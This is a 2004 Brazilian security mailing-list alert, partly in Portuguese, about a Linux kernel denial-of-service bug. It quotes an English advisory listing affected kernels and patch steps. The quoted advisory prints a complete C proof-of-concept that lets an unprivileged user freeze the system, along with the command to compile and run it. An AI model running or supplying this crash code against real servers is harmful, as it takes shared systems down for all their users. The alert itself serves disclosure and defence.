[SECURITY-L] CAIS-Alerta: Vulnerabilidade no kernel do Linux

CSIRT - UNICAMP security em unicamp.br
Qua Jun 16 09:28:43 -03 2004

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From: Centro de Atendimento a Incidentes de Seguranca <cais em cais.rnp.br>
Subject:  CAIS-Alerta: Vulnerabilidade no kernel do Linux
To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br
Date: Mon, 14 Jun 2004 16:56:28 -0300 (BRST)



O CAIS teve conhecimento sobre a existencia de um codigo malicioso que, 
quando executado em um sistema Linux vulneravel, pode causar o travamento 
do sistema e consequente negacao de servicos.

Segundo a fonte do alerta, o problema se manifesta quando o codigo em 
questao e' compilado com o GCC versoes 3.0, 3.1, 3.2, 3.3 ou 3.3.2, e e' 
executado em sistemas rodando o kernel do Linux nas versoes 2.4.2x ou 
2.6.x em arquitetura x86. Sistemas utilizando os processadores AMD64 
tambem podem ser afetadas.

O problema se torna mais serio devido ao fato do usuario que compila e 
executa o programa nao necessitar ter acesso privilegiado ao sistema. 
Assim, qualquer usuario que tenha acesso a um shell no sistema podera 
causar o travamento da maquina.

Sistemas afetados:

Sistemas utilizando os seguintes kernels foram testados e sao 
comprovadamente vulneraveis:

	. Kernel Linux 2.6.x
	. 2.6.7-rc2
	. 2.6.6 (vanilla)
	. 2.6.6-rc1 SMP
	. 2.6.6 SMP
	. 2.6.5-gentoo
	. 2.6.5-mm6
	. 2.6.5 (fedora core 2 vanilla)
	. Kernel Linux 2.4.2x
	. 2.4.26 vanilla
	. 2.4.26, grsecurity 2.0 config
	. 2.4.26-rc1 vanilla
	. 2.4.26-gentoo-r1
	. 2.4.22
	. 2.4.22-1.2188 Fedora FC1 Kernel
	. 2.4.18-bf2.4 (debian woody vanilla)
	. Kernel com patches grsecurity
	. Kernel 2.5.6 SMP
	. Kernel 2.6.6 SMP do Linux.

Alem disso, outras versoes de kernel da serie 2.4 e 2.6 podem ser afetadas 
por esta vulnerabilidade.

Sistemas *nao* afetados:

O codigo malicioso nao causa qualquer estrago e termina exibindo a 
mensagem de erro "Floating point exception" nos sistemas rodando as 
seguintes versoes de kernel:

	. Linux nudge 2.6.5-1um i686 (o kernel do User Mode Linux) Dylan 
	. Linux Kernel 2.6.4 SMP com o patch staircase scheduler Guille 
	. Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
	. Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
	. Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
	. 2.2.19-kernel
	. kernel 2.6.5-1um do User Mode Linux. E' possivel que outras
	  versoes de kernel do User Mode Linux tambem o sejam.

Correcoes disponiveis:

Para corrigir o problema recomenda-se a atualizacao do kernel e aplicacao 
de um patch para o kernel utilizado, de acordo com o que esta descrito em:

. http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Mais informacoes:

. New Kernel Crash-Exploit discovered

O CAIS recomenda que os administradores mantenham seus sistemas e 
aplicativos sempre atualizados, de acordo com as ultimas versoes e 
correcoes oferecidas pelos fabricantes.

Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF:


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>New Kernel Crash-Exploit discovered
>Published 2004-06-11 by xiando, v2.1.5, last updated 2004-06-14.
>A bug lets a simple C program crash the kernel, effectively locking the 
>whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
>  1. The Evil Code
>  2. The Crashing Kernels
>  3. The safe kernels
>  4. The threat
>  5. How to protect yourself
>         * 5.1. Patch for 2.4.2x (vanilla) Kernels
>               o 5.1.1. 2.4.26
>               o 5.1.2. 2.4.25
>               o 5.1.3. 2.4.2x
>         * 5.2. Kernel 2.4.26-rc3-gentoo
>         * 5.3. 2.6.xx kernels
>         * 5.4. amd64
>  6. Bug reports
>1. The Evil Code
>Running this simple C program crashes the Linux kernel.
> #include <sys/time.h>
> #include <signal.h>
> #include <unistd.h>
> static void Handler(int ignore)
> {
>  char fpubuf[108];
>  __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
>  write(2, "*", 1);
>  __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> }
> int main(int argc, char *argv[])
> {
>  struct itimerval spec;
>  signal(SIGALRM, Handler);
>  spec.it_interval.tv_sec=0;
>  spec.it_interval.tv_usec=100;
>  spec.it_value.tv_sec=0;
>  spec.it_value.tv_usec=100;
>  setitimer(ITIMER_REAL, &spec, NULL);
>  while(1)
>   write(1, ".", 1);
>  return 0;
> }
>This bug is confirmed to be present when the code is compiled with GCC 
>version 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions 
>2.4.2x and 2.6.x on x86 and amd64 systems.
>2. The Crashing Kernels
>Minor numbers are versions verified, this is just the top the iceberg:
>   * Linux 2.6.x
>         o 2.6.7-rc2
>         o 2.6.6 (vanilla)
>         o 2.6.6-rc1 SMP (varified by blaise)
>         o 2.6.6 SMP (verified by riven)
>         o 2.6.5-gentoo (verified by RatiX)
>         o 2.6.5-mm6 - (verified by Mariux)
>         o 2.6.5 (fedora core 2 vanilla)
>   * Linux 2.4.2x
>         o 2.4.26 vanilla
>         o 2.4.26, grsecurity 2.0 config
>         o 2.4.26-rc1 vanilla
>         o 2.4.26-gentoo-r1
>         o 2.4.22
>         o 2.4.22-1.2188 Fedora FC1 Kernel
>         o 2.4.18-bf2.4 (debian woody vanilla)
>Even grsecurity-patched kernels crash. "I would have hoped that grsec would 
>have blocked or logged something, but nothing appeared in the logs." Vincent
>3. The safe kernels
>This code does nothing but exit with the error message Floating point 
>exception and can not do any damage to systems running
>   * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
>   * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
>   * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
>   * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
>   * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
>   * 2.2.19-kernel
>It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are 
>safe. Other versions of the Gentoo kernel are not.
>The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other 
>versions of user mode Linux are safe.
>Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter 
>uses a version patched with Con Kolivas Staircase scheduler (but it only 
>affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I 
>left the crash program 10 minutes and after that i killed the task and I 
>continued using my system". Guille
>The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
>The bug is not present in 2.2.19, it seems this bug only affects 2.4 and 
>4. The threat
>Using this exploit to crash Linux systems requires the (ab)user to have 
>shell access. The program works on any normal user account, root access is 
>not required. This exploit has been reported used to take down several 
>"lame free-shell providers" servers (this is illegal in most parts of the 
>world and strongly discouraged).
>This code only works on x86 Linux machines. This code does not compile 
>(makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This 
>doesn't affect NetBSD Stable.
>Check your own system yourself if you are wondering if this affects you. 
>Better safe than sorry. Assume it will crash, sync (even unmount) your file 
>systems before testing. If your system is a production server with 1000 on 
>line users then do not test this code on that box.
>5. How to protect yourself
>The last days were frustrating. Compiling a large number of different 
>kernel versions just to find that gcc crash.c -o evil && ./evil halts the 
>system is quite dull. I hoped some kernels would be unaffected because 
>2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels 
>versions die when evil is executed.
>The Linux Kernel mailing list is found to the right of this article. You 
>may find solutions there not mentioned on this page. The author does 
>subscribe and plans to post (better) solutions here as they appear.
>5.1. Patch for 2.4.2x (vanilla) Kernels
>This just in: 2.4.26_i387.h_patch.txt may be a better solution for 2.4.xx 
>kernels (gentoo bugzilla). not tested by yours truly
>Stian Skjelstad mailed me a working patch 2.4 kernels.
>5.1.1. 2.4.26
>I applied it, confirmed that it works with the vanilla 2.4.26 kernel and 
>made a diff (diff -ur linux-2.4.26/kernel/signal.c 
>>signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
>  1. Read the Kernel Rebuild Guide if this is your first time compiling 
>  your own kernel
>  2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
>  3. Unpack the kernel source and make a symbolic link:
>         * cd /usr/src/
>         * tar xfvj linux-2.4.26.tar.bz2
>         * ln -s linux-2.4.26 linux
>  4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
>  5. Apply the patch
>         * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.26.patch.txt
>  6. Configure and compile as usual.
>5.1.2. 2.4.25
>There is no difference (diff linux-2.4.25/kernel/signal.c 
>linux-2.4.26/kernel/signal.c) between the signal.c included in 2.4.25 and 
>2.4.26, apply signal.c-2.4.26.patch.txt to 2.4.25-vanilla.
>5.1.3. 2.4.2x
>The patch signal.c-2.4.21.patch.txt (diff -ur linux-2.4.21/kernel/signal.c 
>linux-2.4.21-xiando/kernel/signal.c > signal.c-2.4.21.patch.txt) is tested 
>and works for Kernel 2.4.21 (vanilla).
>  1. Get a vanilla 2.4.21 kernel and install it.
>  2. Apply the patch
>         * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.21.patch.txt
>  3. Configure and compile as usual.
>signal.c.2.4.20.patch.txt is tested by Charlie Macdonald on RedHat's 
>5.2. Kernel 2.4.26-rc3-gentoo
>2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a 
>patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
>I have no idea why this kernel version is safe from this exploit. It just 
>is. This kernel patch set returns Floating point exception instead of 
>locking the system when evil is executed.
>This kernel can be used on any Linux system. It does not require any 
>Gentoo-only tools.
>  1. Read the Kernel Rebuild Guide if this is your first time compiling 
>  your own kernel
>  2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
>  3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 
>         * wget http://re.a.la/gs (2,2M)
>  4. Unpack the 2.4.25 kernel source:
>         * cd /usr/src/
>         * tar xfvj linux-2.4.25.tar.bz2
>  5. Apply the Gentoo patchset:
>         * patch -p1 -d /usr/src/linux-2.4.25 
>  6. Rename the kernel and make a symlink from /usr/src/linux:
>         * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
>         * ln -s linux-2.4.26-rc3-gentoo linux
>  7. The Makefile now refers to this kernel as -rc5-gentoo, but when you 
>compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is 
>because the original Gentoo ebuild changed the version in the Makefile or 
>another configuration file to make these match. Open the Makefile in your 
>favorite editor and and change line 4 to say -rc3-gentoo:
>         * cd linux-2.4.26-rc3-gentoo
>         * nano -w Makefile
>         * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
>  8. Configure your kernel
>         * Using your old config: cp /usr/src/linux-oldversion/.config 
>.config && make oldconfig
>         * The Linux kernel can be configured with make menuconfig (CLI) 
>         and make xconfig (GUI)
>  9. Compile your new kernel and install as usual:
>         * make dep bzImage modules modules_install
>         * mount /boot (some distributions mount /boot on startup)
>         * cp arch/i386/boot/bzImage /boot
>         * You may want to call your new kernel something else and edit 
>         Grub or Lilos configuration.
>Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
>5.3. 2.6.xx kernels
>A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel 
>2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc 
>It is tested successfully on Linux-2.6.7-rc2 by yours truly.
>The i387.h patch seems to be the best solution. When evil is executed it 
>does not freeze the system, but unlike the other alternative patches it 
>does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill 
>and killall.
>  1. Read the Kernel Rebuild Guide if this is your first time compiling 
>  your own kernel
>  2. Get a kernel from kernel.org and unpack it to /usr/src
>  3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
>  4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
>  5. Follow the usual steps.
>Other solutions:
>   * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel 
>mail list available at
>         o PATCH fix for Re: timer + fpu stuff locks my console race.
>         o http://lkml.org/lkml/2004/6/12/88
>         o Raw message: andi_kleen_patch.txt
>   * Stian Skjelstad's patch also works with 2.6.7
>         o http://lkml.org/lkml/2004/6/12/64
>   * Sergey Vlasov has a solution at
>         o http://lkml.org/lkml/2004/6/12/81
>5.4. amd64
>IMPORTANT: amd64 is affected as well.
>The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The file 
>that needs the change is include/asm-x86_64/i387.h Ballarin Marc
>6. Bug reports
>   * The exploit was reported as gcc bug 15905 2004-06-09.
>   * This is reported to the linux-kernel list with the subject timer + fpu 
>stuff locks my console race.
>   * Reported to Gentoo Bugzilla as bug 53804
>The lastest version of this documents is available at 
>http://linuxreviews.org/ - Page source:
>   * t2t:2004-06-11_kernel_crash.t2t.tar.bz2
>Copyright (c) 2000-2004 Øyvind Sæther. Permission is granted to copy, 
>distribute and/or modify this document under the terms of the GNU Free 
>Documentation License, Version 1.2 or any later version published by the 
>Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, 
>and no Back-Cover Texts. A copy of the license is included in the section 
>entitled "GNU Free Documentation License"

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